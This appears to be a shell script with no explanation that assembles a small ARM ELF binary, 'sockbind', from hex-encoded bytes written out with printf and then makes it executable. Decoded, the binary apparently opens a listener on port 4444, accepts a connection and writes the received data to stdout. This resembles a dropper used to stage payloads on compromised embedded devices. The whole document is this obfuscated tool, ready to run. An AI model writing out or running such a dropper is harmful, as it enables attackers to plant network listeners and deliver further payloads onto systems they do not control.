rm -f sockbind
printf "%b" "\x7f\x45\x4c\x46\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00" >> sockbind
printf "%b" "\x02\x00\x28\x00\x20\x00\x20\x00\x20\x00\x20\x00\x04\x00\x00\x00" >> sockbind
printf "%b" "\x09\x10\x8f\xe2\x11\xff\x2f\xe1\x34\x00\x20\x00\x01\x00\x00\x00" >> sockbind
printf "%b" "\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x00\xdf\x04\x1c\x11\xa1" >> sockbind
printf "%b" "\x10\x22\x01\x37\x00\xdf\x20\x1c\x49\x40\x02\x37\x00\xdf\x20\x1c" >> sockbind
printf "%b" "\x52\x40\x01\x37\x00\xdf\x04\x1c\x01\x23\x9b\x02\x69\x46\xc9\x1a" >> sockbind
printf "%b" "\x8d\x46\x20\x1c\x1a\x1c\x03\x27\x00\xdf\x02\x1c\x01\x20\x04\x27" >> sockbind
printf "%b" "\x00\xdf\x00\x2a\xf5\xdc\x20\x1c\x06\x27\x00\xdf\x40\x40\x01\x27" >> sockbind
printf "%b" "\x00\xdf\xc0\x46\x02\x00\x11\x5c\x00\x00\x00\x00" >> sockbind
chmod +x sockbind
